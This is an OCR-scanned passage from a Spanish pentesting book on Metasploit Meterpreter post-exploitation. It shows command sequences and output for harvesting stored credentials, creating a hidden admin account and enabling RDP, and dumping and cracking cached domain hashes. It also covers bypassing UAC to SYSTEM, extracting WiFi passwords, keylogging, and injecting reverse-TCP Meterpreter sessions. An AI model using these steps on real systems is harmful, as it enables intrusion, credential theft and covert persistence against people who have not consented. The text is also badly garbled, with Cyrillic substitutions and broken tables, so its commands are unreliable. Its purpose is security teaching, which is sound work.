itado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931073c59d7e8C889c8::: > 
рере:1003:8735172с3а772сбаа30435051494ее:512099009997с305588сағас9сдае960: : : т 
SUPPORT_38894520:1002:2ad3b435b51484eeaad3b435b51404ee:3cb9da96 104388978ebcc944087 25954: :: 


Fig 4.16: Archivos generados por el script winenum, 
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Existe un scripi denominado remotewinenum cuya funcionalidad es idéntica a wineñtum, pero рага 
máquinas remotas. Se debe proporcionar el usuario, la contraseña y la dirección de la máquina 
objetivo. Es decir, se utiliza de puente la máquina vulnerada para, sabiendo las credenciales de 
un usuario de otra máquina, recoger información de una tercera máquina de la red. Por otro fado, 
también se puede ejecutar este script sio parámetros, lo cual hará que se ejecute con las credenciales 
o identidad con las que está corriendo Melterpreter. 


Los scriptis get 

Este tipo de scripts proporcionan, generalmente, la activación o habilitación de un servicio, como 
puede ser el vaso del escritorio remoto o activar ielnet, y la recuperación de información sobre el 
entorno y las credenciales de ciertos servicios o aplicaciones. Este tipo de seript pueden ser de ` 
gran ayuda en una fase de post-explotación debido, precisamente, a las funcionalidades comentadas 
anteriormente. 


A continuación se muestra un listado de los scripts cuyas funcionalidades son las de recolección de 
credenciales e información del entorno vulnerado: 


| Seriot и 
m 


саа 


Descripción 


Devuelve un listado con las aplicaciones instaladas еп la máquina 


gei application list 
5е_арр = vulnerada. 


Devuelve el listado de las variables de entorno de la máquina vulneracda. | 
PERA 


ger епу 


Obtiene las credenciales almacenadas por Filezilla si la aplicación se 
encuentra instalada en el sistema vulnerado.” 


| gel filezilla_creds 
€ x_ Q PR —— + 


Devuelve un listado de tas subredes en las que se encuentra la máquina 
get_local_subnels : 
Ro e E vulnerada. 


Obtiene las credenciales almacenadas por Pidgin si la aplicación se 


| get _pidgin_creds 


encuentra instalada en el sistema vulnerado. 


gel vncpw Obtiene credenciales de УМС, recuperándolas del registro de Windows. 


"Tabla 4.02: Listado de seripis get para recolección de credenciales е información del entorno. 


Los scripts gelcountermeasure, geltelnet y gelgui aportan unas funcionalidades muy interesantes en 
la fase de post-explotación. 


El script getcountermeasure proporciona información sobre la configuración del firewall en la 
máquina vulnerada., Además, da información de la política que dispone la máquina víctima sobre 
DEP, Data Execution Prevention. 


El script gettelnet permite al atacante habilitar el servicio de Telnet en el puerto 23. Existen distintas 
opciones, como son la posibilidad de habilitar sólo el servicio. En este caso lo normal sería conocer 
un usuario y una contraseña para poder conectarse con una aplicación de Telnet, por ejemplo Putly. 
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и hc 


Getieinet dispone, además, de la posibilidad de crearun usuario con contraseña en la ejecución de este 
script, mediante la instrucción run getteinet -u <usuario> -p <password>. Después, simplemente, 
пау que utilizar una aplicación que soporte el protocolo de Telnet para conectarse con dicho usuario 
y contraseña. Por último, comentar que se genera un script рага limpiar la acción de creación de 


& 


usuario, el cual está disponible еп la ruta foot, msf3/logs/script/gettelnet/cleam_up _<fecha>. ye. 


PoC: Creación de usuario y habilitación de escritorio remoto 

El seript getgui permite habilitar el servicio de escritorio remoto. Además, sí se tiene acceso а una 
Ле?! se puede crear fácilmente un usuario con las credenciales que se desee y añadirlo al grupo de 
administradores de ia máquina. Por último, si se conoce el nombre de un usuario y la contraseña de 
éste y se habilita la postbilidad de conectar remotamente con el escritorio de la ináquina vulnerada, 
se podrá gestionar gráficamente dicho sistema haciendo mucho más sencillo su manipulación. Hay 
que tener en cuenta que esta acción puede dejar más huellas que el uso de una simple хле//. 


En el escenario se parte de una sesión de Meterpreter obtenida tras la ex plotación en la fase anterio 
del test de intrusión. La primera acción que ejecutará el auditor es conocer o recordar de (qué 
parámetros dispone el script getgui, Dicho script dispone de los parámetros -e para sólo habilitar el 


Servicio, -u para crear un usuario у -p para asignarle una contraseña, el tuncionamiento es зіна: 
al script getlelnes, 


En primer lugar se habilita el servicio de escritorio remoto, y además se crea un usuario denominado 
hacked con su respectiva contraseña como se puede visualizar en la imagen. 


meteri eter > run getgui -u nacke -p 123арс, в 
f+] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator 
(*] Carlos Perez carlos perezGdarkoperator. com 

t] Enabling Remote Desktop 


pea 


(+) КОР is disabled; enabling it... 

i+] Setting Terminal Services service Startúp mode | 
te; The Terminal Services service is not set to auto, changing it to auto... 
1 Opening port in local firewall if necessary 


{+} Setting user account fer logon 
[+] Adding User: hacked with Password: 123а5с. 
LA MMM a EN Passo rd; 193аы 


Гір 4,17: Habilitar servicio de escritorio remoto con geigui, 


A continuación hay que estudiar las políticas de seguridad que dispone el sistema. Es altamenie 
posible que para conectar vía escritorio remoto se deba pertenecer al grupo de administradores de la 
máquina. Se procede a abrir una shell o línea de comandos vía Meterpreter y se ejecuta la instrucción 
correspondiente para añadir el usuario hacked al grupo de administradores de fa máquina. 


Ineterpreter > sheli 

¡Process 1124 created. 

Channel б created. 

Microsoft Windows Xp [Versión 5.1.2600} 
(С) Copyright 1985-2061 Microsoft Corp. 


C: \WINDOWS\ system32>net Localgroup administradores hacked ¿add 
met tocalgroup administradores hacked ѓай 
152 ha completado el comando correctamente. 


Fig 4.18: Adición del usuario hacked al grupo de administradores. 
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| 
i Н осе к Е BA at la 
Uña vez que se dispone de un usuario perteneciente al grupo de administradores se puede на t p 
Ыы, 15 ked a H i ` H ‚ x | H | 
herramienta reesktop disponible en BackTrack para realizar la conexión. La instrucción а ejecu 
(чи, С 1026555 Efe Oj 
; irección IP> 
la siguiente rdesktop —u hacked -p 123abc. <Dirección ІР>. 


AA Internet 
К? internet Explora: 
Ёар Corren electrónico 
ЙН 0utlool Еуре 

З гн 
Уе 

| e Reproductor de Windows 
Чы 57 Меса 

@ Paseo por Widor ХР 


263 Asistente para transferencia 
de archivos y configurado... 


| 
tadostosprogramas [у О |. 
Моав 5: la. riésktojA 192.168 


Fig 4,19: Conexión mediante escritorio remoto a la máquina vulnerada. 


з ТИ Я ЕУ 
Рог último y una vez realizada la acción que se requiera mediante el uso del езет de re ыга 
{ 1 x РИ # М -4 76 t Жз 
va a proceder a la eliminación automática del usuario y ala desactivación del servicio de д. ai 
[4 . Й И 1 ota ü 
remoto. De este modo, se evita levantar sospechas y se deja el sistema en el estado en el q 
encontraba desde un principio, | 
, * РА тант + ги: | ғр? А ne te 
Cuando se habilitó el servicio de escritorio remoto a través del script реіриі, se creó automáticamen 
а o [М 


un scripi de automatización en la ruta /rooti.msfANogs/script/getgui/clean ир и Jecha re £ | 
que se automatiza la acción de deshabilitar el SOrvicio y la eliminación del usuario. 
1 


Ineterpreter > resource стаси 
{*] Reading .mst4/logs/scripts/getqui/clean up . ‚ге е 
Е ia чо. fi A ево осе ае Cant Falh Terai Server' -y Шш 


nections' -d "1" 


Successful set fDenyTSConnections. A ce Starte айкаБтез* 
!*} Running execute -H -f cmd.exe -»a "/с sc config termserv 


Process 3675 created. | р 
1+] Running execute -H -f cmd.exe -a “"/є se stop termservice 


. 
а -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = 


enable'* 


Process 3716 created, 


i iminació ivación del servicio RDP, 
Fig 4.20: Proceso automatizado para eliminación y desactivación d 
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Los scripts post 


Los scripts pos i Í por 
кзн e son aos asi por la ruta en la que se encuentran. Algunos de estos Scripts 
ап Iuncionalidades ya estudiadas, es i Маш 
] ог esto, que algunos иѕи ; 
Ma > ES p г esto, 5цапоз comentan que 
La | У aótico, ya que se dispone de la misma funcionalidad con distinto nombre o ubicación 
a tula donde se alojan estos scripts es post/<categoria>/<tipo> | 
Este tipo de scripts di і inci 
кын ө SCI Le а de dos categorías principales multi y windows. La calegoría multi 
‘oS Scripts válidos para otros Meterpreter i | scri 
| er en otras plataformas, es decir | 
mdependien j afn. Aat Ин : ба И 
1 [ ntes de la plataforma. La categoría windows en cambio son scripts válidos sólo | 
sistemas operativos Windows. = 
En pri ar se tratará 
primer lugar se tratarán los scripts multi, los cuales pueden ser organizados en tres tipos: 
- Gather. Este ti ripis si infi | 
Е e Este tipo de scripts sirven para recolectar información de aplicuciones, del 
sistema, dei entorno, de la red, de credenciales de aplicaciones, etcétera. | 
~ Manage. Este tipo de scripts permite gestionar otros scripts. 


General. Permiten realizar acciones de ejecución y cierre de tareas en Meterpreter 


Los scripts windows son más variados y específicos del propio sistem 


realizar numerosas tareas sobre la máquina vulnerada. A continuación s 
tipos en detalle, 


а Gperativo, permitiendo 
e organizan los diferentes 


Wireless Scripts 
Este tipo de scri oporci ionali i 
R e de | pis proporcionan funcionalidades relacionadas con la temática Wireless o redes 
i m r S. 7 . . П e e. R , PO R 4 Á z Э 
А К ке de éstos es extraer el máximo de información de los perfiles Wireless que 
р existir almacenados еп la máquina ушпегайа. En sistemas Windows 7 о Windows Vista se 


obtiene la contraseña para redes WPA. mientr | | 
Чоу р » Mientras que en Windows XP se obtiene la llave PBKDF2 


Por mencionar algunos, el script post/windows/wlanhwlan bss list proporciona información sobr 
ia wireless que tiene configuradas la máquina vulnerada. El script do ын. 
м. А о Ha ier | red WiFi está conectada la máquina vulnerada, en caso de que se 
аА El a ( 1 posthwindowshvlanávlan_disconnect intenta desconectar-a 
жун ы а неп ЇЇ. Y рог último, el script posthwindows/wlan/wlan _profile 
rmación, en formato XML, referida a las redes wireless configuradas en la máaui 
vulnerada, incluyendo información como la contraseña de la red WiFi У 


Recon Scripts 


Este ti ripis proporci funcionali 
ipo de scripts proporcionan funcionalidad con la que se pueden obtener resoluciones de 


nombres y descubrimiento de direcej ; 
irecciones IP, Estos s HH FA 
cometido | os scripts utilizan Railgun para llevar a cabo su 
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Manage Scripts 
Este tipo de scriptis permite realizar acciones de gestión sobre la máquina vulnerada. La lista de 
acciones es amplia y variada, por ello, se enumeran las más interesantes en la siguiente lista: 


- Gestión de usuarios. Los scripts postAvindows/manage/delete_user о postwindows/ 
manage/add user_domain permiten realizar acciones sobre los usuarios de un dominio, 
grupo de dominios o máquina local. | | 


- Gestión de elementos de red. La manipulación de certificados se realiza mediante el 
uso de los scripis post/vindows/managefinject_ca o post/windows/manage/remove_cu, y la 
manipulación de hosts mediante posthwindows/manage/inject_host o posthvindows/manage/ 
remove_host. El comando autoroute también se encuentra presente mediante el script post/ 
windows/manage/autoroute y la habilitación del escritorio remoto se puede hacer con el 
script posíáwindows/manage/enable_rdp. 


- * Gestión de procesos y payloads. Con este tipo de scripts se puede compartir la máquina 
vulnerada con otro equipo mediante la inyección de un nuevo payload a través de la ejecución 
de posthvindows/manage/payload_inject LUOST=<dirección ІР máquina nuevo equipo. 
Lógicamente, el nuevo equipo deberá tener montado el handler exploithmti/handler рага 
recibir la sesión. El comando migrate también dispone de un script con posihwindows/ 
manage/migrale. 


- Ejecución de un script de Microsof! Windows PowerShell. Esta posibilidad dota de 
flexibilidad y potencia a Metasploit. En una sesión de Meterpreter se puede ejecutar un script 
de PowerShell gracias al script posY/windows/manage/powershell/exec_powershell. 


Es recomendable visualizar el listado de los scripts de gestión ya que aportan gran flexibilidad 
y potencia а la sesión de Meterpreter. A continuación se puede visualizar el listado de scripís 
disponibles. 


meterpreter > run post/windows/manage/ 
run post/windows/manage/add_user_ domain 
run post/windows/manage/autoroute 

run post/windows/manage/delete user 

run post/windows/manage/download_exec 
run post/windows/manage/enable_rdp 

run post/windows/manage/inject_ca 

run post/windows/manage/inject_host 

run post/windows/manage/migrate 


¡run post/windows/manage/persistence 

¡run post/windows/manage/powershell/exec_powershell 
¿run post/windows/manage/pxexploit 

trun post/windows/manage/remove_ca 

¿run post/windows/manage/remove_host 

irun post/windows/manage/run_as 


irun post/windows/manage/vss_ create 
run post/windows/manage/vss_list 


run post/windows/manage/multi_meterpreter_inject run post/windows/manage/vss_mount 


run post/windows/manage/vss sei storage 


run post/windows/manage/nbd server 
irun post/windows/manage/vss storage 


run post/windows/manage/payload inject 
Fig 4.21: Lista de scripts de gestión de post/windows/manage. 


Gather Seripts 

Los scripts de tipo gather proporcionan funcionalidad para recolectar y comprobar todo tipo de 
información en la máquina vulnerada. Son los scripts que más abundan en Meterpreter y pueden 
ayudar y mucho a conocer el estado de la máquina, del entorno y obtener el máximo de información, 


tanto confidencial como relevante, de dicha máquina. 
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Se pueden organizar per temáticas п objetivos, los cuales se enumeran a continuación: 


Credenciales. Los scripts post/windows/gather/credenticls son capaces de recoger las 


credenciales de gran cantidad de aplicaciones o servicios que se encuentren presenten en la 
máquina vulnerada. | 


use post/windows/gather/credentia 5/согеїї 
juse post/windows/gather/credentials/creden 
E post /windows/gather/credentials/dyndns 


use post/windows/gather/credentials/mecho 
use post/windows/gather/credentisls/mremote 
use post/windows/gather/credentials/nimbuzz 
use post /windows/gather/credentials/ outlook 


р 
tial_collector 


use post/windows/gather/credentials/enum_cred_store 
use post/windows/gather/credentials/entmpicasa_puds н post/windows/gather/crestentials/razorsql 


use post /windows/gather/credentials/epo sgl use post/windows/gather/credentials/smartftp 


H 

juse 1ost/windows/gather/credentials/fitezilla server [изе post/windows/gather/credentials/tortoisesyn | 

use post/windows/gather/credentials/flashfxp juse post/windows/gather/credentials/total_conmander 

use post/windows/gather/credentials/ftpnavigator use post/windows/gather/credentials/tritl an 

use post /windows/gather/credentials/gpp use post/windows/gather/credentials/wnc 

use post/windows/gather/credentials/idm use post/windows/gather/credentials/windows autolugin | 
use post/windows/gather/credentisls/winscp ү} 

juse post/windows/gather/credentiais/wsřtp client | 
it PSN 


Fig 4.22: Listado de scripts para recolección de credenciales en la máquina vulnerada, ' 


изе post/windows/gather/credentials/imail 


use post/windows/gather/credentials/imvy 


-~ Comprobaciones y enumeracicnes. El script posthwindows/eather/checiovm permite 
comprobar si la máquina vulnerada es una máquina virtual o no. En caso afirmativo 
se especifica qué tipo de sofhware de virtualización se está utilizando. Los scripts que se 
encuentran en la ruta post/iwindows/gather/enum permiten enumerar o listar una serie de 
recursos o propiedades. Por ejemplo, se pueden listar las aplicaciones instaladas en la 
máquina vulnerada, listar los dispositivos que contiene, listar los usuarios logueados, los 
recursos compartidos, los tokens, etcétera. 


post /windows/gather/enum_applications post/windows/gather/enum hostiite | 


post/windows/gather/enum_ie 
post/windows/gather/enum logaed_on_users 


post/windows/gather/enum_computers post/windows/gather/enum ms product keys 
post/windows/gather/enum devices post/windows/gather/emm_powershelt епу 
post/windows/gather/enum dirperms bost/windows/gather/enum services 
post/windows/gather/enum domain post/windows/gather/enum shares 
ther/enum_domain group users post/windows/gather/enum snmp 
post/windows/gather/enum domain tokens post/windows/gather/enun termsery 
post/windows/gather/enum domains post/windows/gather/enum tokens 


post/windows/yather/enum files post/windows/gather/enum unat tend | 


Fig 4.23: Listado de scripts para enumerar recursos y propiedades. 


- Forense. Existen scripts para realizar búsquedas forenses en la máquina vulnerada. Por 
ejemplo, el seript PostAvindows/gather/forensics/imager permite realizar nna imagen буе 
а dyte de discos remotos о volúmenes. El script posthvindows/gather/forensics/enusn_ 
drives permite listar las unidades y volúmenes de la máquina vulnerada. Estos scripts son 


interesantes para realizar pequeñas pruebas de análisis forense en remoio sobre la máquina 
vulnerada, 


- Espionaje de pantalla. Mediante е! uso de posthvindows/gather/screen_spy se realiza 
una captura de pantalla cada 5 segundos, configurables, por lo que se va reconstruyendo lo 
que está viendo la víctima. Realmente, para realizar espionaje de pantalla es mejor utilizar 


УМС, sin controlar la máquina víctima, simplemente para visualizar lo que está realizando 
la máquina vulnerada. 
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PoC: Obteniendo hashes de usuarios de dominio | 
En esta breve prueba de concepto se presenta е! siguiente escenario: 


- El auditor ha vulnerado una máquina, aparentemente no es una máquina de dominio, Pero 
al ejecutar el script postáwindows/gather/cachedump éste observará que hay с edenciales de 
usuarios de un dominio. 


- 1а máquina vulnerada es Windows XP SP3 y el auditor utiliza BackTrack 3, 


EI punto de partida es la sesión de Meterpreter al lanzar el script postívindows/gather/cachecump 
se obtendrá un listado de usuarios у hashes de dominio, entre ellos el administrado: del оа 
¿Cómo es esto posible? Los sistemas operativos Windows almacenan por пег, r decir por 

política, los últimos 10 usuarios que han iniciado sesión en el dominio каше ! aa | 
operativos Windows XP/2003 los hashes se almacenan en formato MSCashl y puros so бек 
de manera rápida, con velocidades de miles de hashes por segundo, En sistemas oper alp n 4 H 
Fista/2008 y superiores se almacenan en un formato mucho más seguro como es MSCash2, el cua 


hace que se logren velocidades 10 veces inferiores a la anterior versión del algoritmo. 


gter > run post/windows/gather/cachedump 


meterpr 


*] Executing module against PRUEBAS-01760CC | 

a Cached стен Setting: 10 - (Мах is 50 and 0 disables, and 10 is default) 
(*) Obtaining. boot key... 

[+] Obtaining Lsa key... 

1+] XP compatible client 

[*] Obtaining LK$KM... | 

{*] Dumping cached credentials... | 
+} John the Ripper format: Й + 
тазаа ТЗТ две TOBA fIBTBfS92:METASPLDIT. LOCAL ¿METASPLCTEN] 
tadministrador:74e8d8c50bb4ab36bb7d5edd488c8649:METASPLOIT.LOCALA:METASPLOIT 


|191 Hash ere in MSCACHE format. (mscash) Ж 
i i 4 Н Н + TO ЫЧ 
Fig 4,24: Obtención de hash:es de dominio para su posterior cracking. 


Una vez conseguidos los hashes se pueden crackear con la ayuda de las aplicaciones Cain о 
The Ripper, Otra opción a estudiar es la posibilidad de utilizar una GPU para agilizar, y mucho, el 


proceso de fuerza bruta. 


ola de ./jobn ->wordlist:/root/diccionario.txt --format:mscash /root/w 
ee. txt ; 
Loaded 2 password hashes with z different salts (M$ Cache Hash [Generic 1x]) 


123abc. (administrador) 
¿3abc. flu) | 
ел 2 time: 0:00:00:00 100.00% (ETA: Fri Aug 31 15:56:51 2012) c/s: 1008 trying: 123 - k 


ía 


Fig 4.25: Cracking de hashes MSCashv! con John The Ripper. 


Escalate Scripts | dida 

Este tipo de scripts son а la vez mini exploits ya que se encargan de intentar elevar р! 'vilegios en la 

máquina vulnerada, El éxito de la ejecución de estos scripts dependerá del sistema Operativo donde 
А ‚ ка, 


se ejecuten, 
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Uno de los más famosos para sistemas Windows XP es post/windows/escalate/getsystem. El script 
post/windows/escalate/bypassuac permite. elevar privilegios en sistemas Windows 7 о Windows 
Vista, y de este modo llegar a ser el usuario System. 


PoC: Bypass a UAC en Windows 7 con obtención de información WLAN 

En esta prueba de concepto se presenta un escenario en el que el auditor ha explotado una 
vulnerabilidad en un sistema como Windows 7, Windows Vista, о Windows Server 2008/R2, en este 
caso se hará referencia siempre a Windows 7, 

El auditor dispone de una sesión de Meterpreter con un usuario estándar sin privilegios. El objetivo 
es elevar privilegios llegando a ser usuario System y obtener información subre las redes wireless 
que tiene configurado y utilizar así la máquina vulnerada. Además, de encontrar información útil 
sobre contraseñas de las redes wireless, lo cual puede aportar una nueva vía de investigación en el 
iest de intrusión, | 


MES me сс er e m 


~ 


payload => windows/meterpreter/reverse_tcp 
thost => 192.168,1.48 

lport => 4444 

[*] Started reverse handler оп 192.168.1.40:4444 
[+] Starting the payload handler... | 

[*] Sending stage (752128 bytes) to 192.168.1.42 


[*] Меїегргеїег session 1 opened (192,158.1.40:4444 -> 192,168,1.42:1079) at 2012-08-31 02:14:08 
+9200 


аа а уч а а а нутта чтец 


meterpreter > getuid 
Server username: bit-Pcipablo 


ьа o ан 


Fig 4.26: Obtención de la consola de Meterpreter. 


05? exploit(handier) > sessions -i 1 
[*] Starting interaction with 1... 


meterpreter > getsystem 


meterpreter > getuid 
Server username; bit-Pcipablo 


meterpreter > getsystem 


Н 
^С{-1 Error running command getsystem: interrupt | 
| 
[-] priv elevate getsystem: Operation failed: Access is de | 


niet. j 


Fig 4.27: Intento de elevación de privilegios sin éxito. 


La primera acción que se intentará es utilizar el script de tipo elevute para realizar un bypass a ЈАС. 
Tras lanzar el script post/windowstescalate/bypassuac se obtiene una nueva sesión de Meterpreter, 
con identificador distinto lógicamente. Si se ejecuta el comando sessions —/ en msfconsole se puede 


visualizar que, aparentemente, se dispone de una nueva sesión de Meterpreter соп el mismo usuario 
que en la sesión previa. 


Realmente esto no es cierto, ya que cuando se interactúe con la nueva sesión de Meterpreter y se 
ejecute la instrucción gefsystem, se obtendrá éxito en el intento de elevación de privilegiosica la 
máquina vulnerada. 


| +0288 
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sterpreter > fun post/windows/escalate/bypassuac $ 


R 


1 
| 
| 
| 
рж] started reverse handler on 192.168.1.49:4444 | 
[+*+] Starting the payload haniler... | | 
[+] Uploading the bypass UAC executable to the filesystem... i | 
[4] Heterpreter stager executable 73802 bytes long being uptoaded. . | | 
is Uploaded the agent to the filesystem... | 
meterpreter > | | 
[+1 sending stage (152128 bytes) to 192.168,1.42 az | ИЛЕК 
{91 ео 2 opened (192.168.1.40:4444 -> 192.108.1.42:1086) at 2012-58-31 92:21:32 


i=} Session 10 2 (192.169.1.48:4444 -> 192.168.1.42:1086) processing InitialáutoRunScript ‘migra 
te -[' | ‚ 
+] Current server process: mFzdzdwLsdqgv.exe (4248) 
2} Spawning notepad.exe process to migrate to. 
р Migrating to 3296 
¡.¿ Successfully migrated to process 


{ 
! 
t 


asterpreter > background 
|е] Backgrounding session 1... 
sí exploit(handler) > sessions -l 


Active sessions 


AAA A O 


=z 


Id Type Information Connection 


ене. 


| 
| 
| 
| 


1  meterpreter x85/win32 bit-PC\pablo @ BIT-PC 192,168.1.40:4444 -> 192,168.1.42:1079 (182. 
.1,42 ‚ 7 Е 197. 
ё i б PR xB6/win32 bit-PC\pablo @ BIT-PC 192.168.1.40:4444 -> 192.168,1.42:1086, (192 


\168.1.42) 
Fig 4.28: Ejecución del scripi post/windows/escalate/bypassnue. 


| 
| 
| 
| 
| 
| 
| 
| 
| 
| 


Р М 
eterpreter > getsystem | 
...901 system (via technique 1). 
mererpreter > yetuid 
Server username: NT AUTHORITYA SYSTEM 
meterpreter > shell 
Process 5352 created. 
Channel 1 created, А РА 
Microsoft Windows [Versión 6.1. | 
Copyright (c) 2699 Microsoft Corporation. Reservados todos los derechos. 


_—————————4 


C:WWindowsYsystem32>whoami 
vwhoami | 
nt authority\system 


C:WitindowsA system32>] 


Fig 4.29: Elevación de privilegios con éxito en Windows 7. 


. TEE E EE ТҮР 
En este punto el auditor dispone de un usuario System con el que puede realizar cualquier tipo ‹ 
acción sin restricción en la máquina vulnerada. 


; adag о ‹ A va Јурај, ү 
Para realizar la recogida de información de las redes wireless almacenadas en la máquina Й indows 
кы | . o ы а primera 
7 se ejecutan los scripts de tipo wireless, los cuales han sido explicados anteriormente. La primer: 
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—_——— 


acción que se lleva а cabo es obtener un listado de las redes wireless que la máquina tiene 


almacenadas, este hecho significa que, generalmente, en algún momento la máquina vulnerada se 
ha conectado a dichas redes. 


a анар 


meterpreter > run post/windows/wian/ulan bss List 


| 
[+] {"бе11аз1Еггог"шьф, “return*=>9, "ppHlandssList"=>3359544] 
[+] Number of Networks: 18 
[et SSID: WLAN AA | 
В5515: 00:02;сї:се:с6:1а 
Туре: Infrastructure 
PHY: Extended rate pyy type 
RSSI: -39 
| Signal: 93 


f 

Н 

| 

[+] S5ID; JAZZTEL_ 2011 | 

| 85510: 00:1a:2b:65:eb:75 і 
Type: Infrastructure | 

| PHY: Extended rate puy type | 

і RSSI: -85 H 

| Signal: 25 : 

lo: SSID; WiFi8D1703 

Н 05510; 88:25:2с:08:11:00 

| Тура: Intrestructura Н 

PHY: 802.11n PHY type 

А55]: -89 

Signal; 33 


aieeaa | 
Fig 4.30: Obtención del listado de redes wireless de uma máquina Ид; 


Con el script posiAwindows/wlantwlan_profile se puede obtener un уоїсайо de un fichero en 
formato XML сов la información detallada de las redes wireless. Entre dicha in formación están las 
contraseñas para conectarse a esos redes. En la imagen se puede visualizar una parte dei volcado, la 
parte donde. зе encuentra información sensible como la contraseña y ei nombre de la red. 


[Saro ех " ч Ң 
¡ Profile Мате: WLAN АА ' | 
<3xml version="1,9"7> | 
<WILANProfile Уле АРУ Лиин microsoft, com/networking/KLAN/profite/v1”>] 


<ПаМе>И АМ АА</пате> | 
«SSIGConf ig> Н 
<SS1D> | 
<ћех>574С4: 1141</hex> | 
<пате> КАМ </name> 
</5510> | 
</SSIDConfig> f | 
<comnectionType>ES5</connectionType> 
<comnectionMode>auto</connectionMode> | 
<MEM> 
<security> 
<authEncryption> 
<authentication>open</authentication> 
<encryption>WEP</encryption> і 
<usebnex>Talse</use0nex> 


Fig 4.31: Volcado de información sensible de redes wireless. 


Por último, también se puede realizar esta operativa a través de la línea de comandos de la máquina 
vulnerada. Para abrir una línea de comandos en Meterpreter se ejecuta el comando shell y se escribe 
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| Ae y información de las redes wireless configurada. 
е! comando netsh wian show profile para recuper ar ta información d че i Гв 
en la máquina vulnerada. Se recomienda redirigir esa salida а un archivo y от 
а з l dd obtener dicho archivo. También se puede ejecutar la instrucción netsh wlan 
comando download ооепе РО ч | ] { ir 
| t profile folder=. key=clear, con la cual se hace un volcado de los perfiles wireless a ficheros, 
export profe jolder=. Ке) je incas lve en texto plano. 
` Р ү ТЕ ter. La contraseña se devuelve en texto plano.\ 
XML en la ruta especificada en el parámetro folder. La contraseña 


‚+ e Serints . 
Capture бегїрї с E | lado, 
ЫН га! scripís proporcionan funcionalidades para realizar capturas de las pulsaciones de teclado 
En otras palabras. se activa un kevlogger en la maquina vulnerada. Como ejempl р 

оп owas palabTas, se e windows € i 'OESEF 

scripts postwindows/cuapture/keylog_recorder y posthwindows/capture/lockout_keylogge 


| ИНИ seripis | 
ү о des рай realizar varias operaciones а la vez. Comúnmente, se pueden епсопїга! 
los siguientes: | 
й Мишсоттопа. Este script permite al Usuario poder lanzar distintos н 
ejemplo de Windows, en una sola instrucción, Además, se puede и Ss: Е: 
cada comando en un fichero para su posterior análisis. Permite a tam en a de 
de attomatización RC, lo cual ayuda a simplificar la ejecución de еле de a e 
anterioridad. Un ejemplo de ejecución de este script sería run is ЕА 
{б dir” “ipconfig”, "<más comundos>”. No debe existir separación enie r am н 
у las comas, ya que el script se encarga de parsearlo. Es posible sale . е 
la ejecnción en un fichero mediante el parámetro —f, un ejemplo с. о 
el “<comandol>”, "<comandoN "> -f <fichero local>. Dicho fichero se 
automaticamente por Meterpreter a la máquina del auditor. 


imi енот, multi 1 - Única 
Mulli_comsole_command. Este script es similar al anterior, multicommand. La | 
- 240 а М [я ДУ, Б: » і бп |, | н | а с 
diferencia es que no dispone de la opción de almacenar en un fichero la salida los com ae 
© VIC Cs at ps Е $ | | | a le ч f ы 
que se ejecutan en la máquina vulnerada. Por esta razón, está considerado una versión antig 
де multicammand. | ыы 
interes: | ermite Inyecte 
Multi meter_inject. Este script es realmente interesante уа que permite a 
Meterprelers en otros procesos de la máquina vulnerada, y configurando piel e 
( | | . = . : a y 1 { 
deben conectarse si la conexión es inversa. En la siguiente tabla se pueden visua ы 
distintos parámetros de este script. 


Parámetro Descripción —— 
а tmulti ller para le 110 у 
Este parametro arranca el módulo exploit/multihhandler para la conexiór 


i ió ‚ s deben ir 
Proporciona múltiples PID para la inyección de Meterpreter, los PIDs esos 
separados por comas. 


: ez a vērsa» 

j i | ү; conexión IN VETS 

Proporciona múltiples direcciones IP las cuales esporatán le в 1 
Dichas direcciones 1Р deben ir separadas por comas. _ 8 ай ás 
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с . : Н tor podrá с robar 
аа - Sniffer. Este módulo proporciona funcionalidades con las que el auditor podrá compro 
a e. ТА qe E > . А Н А "A А “рү е 
Parámetro Descripción | y aprovechar el entorno de red de la máquina vulnerada. Por ejemplo, se podrá conoce: 
x ч i 9 ў e , А * 
-р е езрестиса el puerto donde están a la escucha los handler entorno de red y el tráfico que circula por éste de dicha máquina. 
-рі specilica el Meterpreter, que por defecto es win ows/melerpreter/reverse_1cp. 


ilizació i 7 i nando joad Yambién se podría 
Para la carga o utilización de dichos módulos se dispone del coma 


AA А У E PAETI 
SOR OA шананы der ЕЕ utilizar el comando «se, ya que realiza la misma función, pero se encuentra еп desuso. 


neterpreter > run multi_meter_inject -mp 668 -ar 192,108,1,40,197.190.1.41 
[*] Creating a reverse meterpreter stager: 1H0ST=192.168.1.40 LPURT=5555 
'>; Starting Notepad.exe to house Meterpreter Session, 

х: Process created with pid 268 

[+] Injecting meterpreter into process 1D 268 

{+} Allocated memory at address 9х003а0808, for 290 byte stager 

[*] Writing the stager into memory... 


-p 5555 


| А | Gl primero proporciona ja ayuda 
И comando load dispone de dos parámetros, que son —h y l. El proa pper a : е 
М j 3 1 | Y e 1 ( { © ПЯ ү қ ~ 
e información de uso del comando. БЇ segundo en cambio devuelve un listado de los mi 
disponibles para ser cargados en Meterpreter. 


! ГООО О сл priv 

LL. Successfully injected Meterpreter іп te process: 268 ВАР и reter > load -l ргім.хб4 
“e ж. Нр 2 . ` . 1а 
Pig 4.32: Ejecución de multi_meter_injecs, | КР, 


в sniffer 
но sniffer,x64 

€ { ari 
incognito.x64 йош т 
lanattacks CAN 
lanattacks.x64 meterpreter > 


amin AA mr art. 


Tras lanzar el script, si otro usuario o máquina se encontrase con un handler activo prepar 


ado 
para recibir sesiones de Mererpreier se podría recoger tal y como se observa en | 


a imagen. 
payload => windows/meter 


lhost => 192,168.1,48 
lport => 5555 
[*] Started reverse handler on 192,168.1.48:5555 
{*] Starting the payload handler... Р 3 
[*] Sending stage (752128 bytes) to 192.168.1.35 | Módulo: Espia | с 9 | з ión de Meterpreter load 
[+] Meterpreter session 1 opened (192.168.1,49:5555 -> 132.168.1.35:1103) at 2012-08-31 06:26:38 Para cargar el módulo espia se utiliza la siguiente instrucción en una Sesto ER 
+0200 ` 

I 


A Pap А А уната л el 
espia. A continuación, si se ejecuta help se puede obtener el listado de со! andos que proporcione 
meterpreter > Y 


7 ја pr cl i ando. 
nuevo módulo cargado. En este caso, el módulo espia proporciona un eao comando 
er_inject. 


i i anta! л máquina vulnerada. 

E “reenerab permite al auditor obtener capturas de pantalla de la máquina vulnerad: 
у ili i ravés del uso de otros comandos о 
Esta es una funcionalidad que ya se ha utilizado en este libro a través de ОЕК 

И З imi entar dí tas 5 5) 
